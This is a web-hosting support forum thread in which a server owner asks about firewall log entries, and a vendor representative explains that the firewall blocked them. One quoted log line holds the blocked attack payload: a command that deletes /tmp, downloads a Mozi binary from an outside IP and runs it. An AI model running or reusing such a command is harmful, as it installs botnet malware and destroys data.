Announcement

Collapse
No announcement yet.

Should I be concerned about these log entries?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Should I be concerned about these log entries?

    - Anomaly detected in file /tmp/#sql_80d_2.MAD. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

    There was a number of these log entries around the same time:

    - IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

    I don’t see #sql_80d_2.MAD in /tmp

    It looks kind of nasty.

    Any insight would be appreciated.

    Thx
    G

  • #2
    Hello Glenn,
    Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
    You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
    If you have any other questions, feel free to ask here. Thank you for contacting us.

    Comment


    • #3
      Thanks Sergey for your reply. My tech confirmed as well that its nothing to worry about.

      Comment

      Working...
      X